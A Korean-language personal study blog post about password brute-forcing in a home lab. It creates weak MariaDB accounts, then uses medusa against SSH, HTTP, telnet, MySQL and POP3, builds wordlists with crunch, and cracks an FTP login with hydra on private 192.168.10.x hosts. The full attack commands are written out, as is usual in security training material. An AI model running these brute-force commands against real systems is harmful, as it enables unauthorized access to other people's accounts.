2024. 1. 27. 22:28ㆍInformation Security 정보보안/Network Security 네트워크 보안
배울 내용:
Medusa 공격
Hydra 공격
리눅스 사전파일 만들기
crunch 비밀번호 만들기
크런치 공격
네트워크 공격
네트워킹 해킹
무차별 대입공격
Brute force attack
비밀번호로 해킹하기
MariaDB 해킹
제가 지금 부터 작성하는 모든글은 제가 공부기록용이기 때문에 정확하지 않을수 있음을 알려드립니다.
틀린게 있으면 댓글로 써주시면 고치겠습니다.
MariaDB
접속
방화벽을 꺼주고
systemcl start mariadb 로
mariadb를 start 시키고
mysql -p mysql 로 mariaDB 를 켜준다
root 패스워드 설정
update user set password=passoword("123456") where user='root';
계정 생성/추가
1. 내부에서만 접근
insert into user(host,user,password) values ("localhost","korea,password("123456"));
2. 외부에서의 접근
insert into user(host, user ,password) values ("%" , "korea",password("123456"));
모든 외부 접근 가능
insert into user(host, user ,password) values ("192.168.10.100" , "korea",password("123456"));
192.168.10.100 만 접근가능
insert into user(host, user ,password) values ("192.168.10.%" , "korea",password("123456"));
192.168.10.* 모든 C 클래스 접근 가능
%를 넣으면 외부사용자가 사용할수있고
특정ip 를 넣어서 그 특정 ip만 사용하게 할수있다
이렇게 해준뒤에
flush privileges;
로 적용 시켜주고
systemctl restart mariadb
로하면 완벽하게 준비가 된다
kali에서 192.168.10.101 로 brute forcing 공격하면
연결 허락을 안해줬기떄문에 안되고
연결을 해주게 되면
이번에는 되는걸 볼수가있다
[ medusa ]
또다른 패스워드 크래킹 도구
# medusa -u test -p 123456 -h 192.168.10.150 -M ssh
# medusa -u test -p 123456 -h 192.168.10.150 -M http
# medusa -u test -p 123456 -h 192.168.10.150 -M telnet
# medusa -u test -p 123456 -h 192.168.10.150 -M mysql
# medusa -u test -p 123456 -h 192.168.10.150 -M pop3
위에처럼 모듈을 골라서 명령을 입력하면
성공하면 Account Found 가 위에 처럼 뜬다
그리고 맨뒤에 [ SUCCESS] 로 성공한걸 볼수가있다
웹서버 포트로도 브루트포싱을 할수있는 특징이있다
<옵션>
-u : 계정명
-U : 계정 목록(사전 파일)
-p : 패스워드
-P :패스워드 목록(사전파일)
-h : 공격 대상 호스트 지정
-M : 모듈
[ 사전 파일 만들기 ]
crunch
패스워드 생성 도구
# crunch 4 4 1234567890a -o /root/crunch2.txt
# crunch 4 4 1234567890a -t 12@@ -o /root/crunch2.txt
앞에 12는 알때 (비밀번호중)
# crunch 4 4 1234567890a -t 12@@ -o /root/crunch2.txt -p
# crunch 4 4 1234567890a -o /root/crunch2.txt 이렇게 만들고
확인해보면 1~ 9999 로 만들어져있는게 확인할수있을것이다
만약 비밀번호가 sarimus24 라고 할때
비밀번호 길이하고 비밀번호중 sarimus 부분만 알고있을때
뒤에 2개 를 알아낼때 아래와 같이 할수있다
crunch 9 9 1234567890 -t sarimus@@ -o findPassword.txt
이렇게 완성이 되서 파일을 열어보면
실제 비밀번호인 sarimus24 가 있는걸 확인할수있다
이러한 방법으로 test라는 계정에
비밀번호 파일을 만들어 시도해보자
우리는 지금까지 test 가 123456 인걸알고있다
그러면 123456을 잠시 12ab 로 바꾼뒤에 시도 해보자
먼저 cent OS 에서 test 의 비번을 12ab 로 바꿔주고
Kali에서 crunch 로 비밀번호를 생성해주고
이렇게 만든뒤에
hydra 로 찾아본다
hydra -l test -P /root/findTestPW.txt ftp://192.168.10.101 -V -f
로 입력해본다
이미 계정을 아니깐
hydra -l test
그러나 비밀번호를 모르니깐 아까 crunch로 만들었던
-P /root/findTestPW.txt
그리고 ftp 로 centos 서버인 1921.68.10.101 로
ftp://192.168.10.101
자세히 보여주게 Verdose 모드와 강제모드를 설정해준다
-V -f
그러면 수많은 시도 끝에
성공하게 되는걸 볼수가있다
참고로 포트번호도 -s 옵션으로 설정할수있다
아직 hydra를 잘 이해가 안되면 아래의 링크로 가보자
https://sarimus.tistory.com/58
그러면 포트번호도 가능하니깐
모듈도 txt 에 써서 굳이 몰라도 한번에 모든 모듈을 확인할수있다
target.txt 에는
이렇게 원하는 IP 주소도 넣어서 한번에 시도해볼수도있다
(192.168.10.101:2121 이런식으로 포트번호도 넣을수있다 )
유용하게 써먹을수있으니 잘기억해두자
그럼 20000~~